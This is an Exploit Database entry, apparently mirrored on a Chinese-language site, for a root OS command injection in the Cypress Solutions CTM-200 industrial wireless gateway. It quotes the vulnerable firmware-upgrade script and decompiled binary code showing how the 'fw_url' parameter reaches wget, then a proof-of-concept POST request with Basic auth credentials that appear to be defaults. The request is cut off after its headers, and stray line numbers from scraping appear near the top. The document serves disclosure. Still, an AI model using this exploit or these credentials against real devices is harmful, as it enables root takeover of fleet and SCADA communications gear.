Cypress Solutions CTM-200 2.7.1 – Root Remote OS Command Injection

Exploit Database
122 阅读

作者： LiquidWorm

日期： 2021-10-13
类别：
- remote
平台：
- hardware
来源：https://www.exploit-db.com/exploits/50408/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

# Exploit Title: Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection

# Date: 21.09.2021

# Exploit Author: LiquidWorm

# Vendor Homepage: https://www.cypress.bc.ca

Cypress Solutions CTM-200 2.7.1 Root Remote OS Command Injection

Vendor: Cypress Solutions Inc.

Product web page: https://www.cypress.bc.ca

Affected version: 2.7.1.5659

2.0.5.3356-184

Summary: CTM-200 is the industrial cellular wireless gateway for fixed and mobile applications.

The CTM-200 is a Linux based platform powered by ARM Cortex-A8 800 MHz superscalar processor.

Its on-board standard features make the CTM-200 ideal for mobile fleet applications or fixed site

office and SCADA communications.

Desc: The CTM-200 wireless gateway suffers from an authenticated semi-blind OS command injection

vulnerability. This can be exploited to inject and execute arbitrary shell commands as the root user

through the 'ctm-config-upgrade.sh' script leveraging the 'fw_url' POST parameter used in the cmd

upgreadefw as argument, called by ctmsys() as pointer to execv() and make_wget_url() function to

the wget command in /usr/bin/cmdmain ELF binary.

================================================================================================

/www/cgi-bin/webif/ctm-config-upgrade.sh:

-----------------------------------------

136:if ! empty "$FORM_install_fw_url"; then

137: echo "</pre>"

138: echo "<br />Installing firmware to flash ... DO NOT POWER OFF CTM-200 Gateway!<br /><pre>"

139: cmd upgradefw "$FORM_fw_url"

140: unset FORM_install_fw_url FORM_submit

141: echo "</pre><br />Done."

142:fi

==================================================================

cmdmain (ELF):

memset(&DAT_0003bd1c,0,0x80);

make_wget_url(*ppcVar9,&DAT_0003bd9c,&DAT_0003bdbc,&DAT_0003bd1c);

sprintf(local_184,"%s%s -O /tmp/%s",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),

*(undefined4 *)(iParm2 + 8));

ctmsys(local_184);

sprintf(local_184,"/tmp/%s",*(undefined4 *)(iParm2 + 8));

iVar3 = ctm_fopen(local_184,"r");

if (iVar3 == 0) {

uVar5 = *(undefined4 *)(iParm2 + 8);

__s = "vueclient -cmdack \'confupgrade:%s FAIL DOWNLOAD\' &";

goto LAB_0001f4a8;

}

ctm_fclose();

memset(local_184,0,0x100);

sprintf(local_184,"%s%s.md5 -O /tmp/%s.md5",&DAT_0003bd1c,*(undefined4 *)(iParm2 + 8),

*(undefined4 *)(iParm2 + 8));

ctmsys(local_184);

=================================================================

cmd (ELF):

while (sVar1 = strlen(__s2), uVar7 < sVar1) {

__s2[uVar7] = *(char *)(__ctype_tolower + (uint)(byte)__s2[uVar7] * 2);

__s2 = *ppcVar8;

uVar7 = uVar7 + 1;

}

uStack180 = 0x7273752f;

uStack176 = 0x6e69622f;

uStack172 = 0x646d632f;

uStack168 = 0x6d632f73;

uStack164 = 0x69616d64;

uStack160 = 0x6e;

uStack159 = 0;

iVar2 = execv((char *)&uStack180,ppcParm2);

================================================================================================

Tested on: GNU/Linux 2.6.32.25 (arm4tl)

BusyBox v1.15.3

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

@zeroscience

Advisory ID: ZSL-2021-5687

Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5687.php

21.09.2021

PoC POST request:

-----------------

POST /cgi-bin/webif/ctm-config-upgrade.sh HTTP/1.1

Host: 192.168.1.100

Connection: keep-alive

Content-Length: 611

Cache-Control: max-age=0

Authorization: Basic YWRtaW46Q2hhbWVsZW9u

Upgrade-Insecure-Requests: 1

Origin: http://192.168.1.1

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZlABvwQnpLtpe9mM

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: http://173.182.107.198/cgi-bin/webif/ctm-config-upgrade.sh

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6

Cookie: style=null

sec-gpc: 1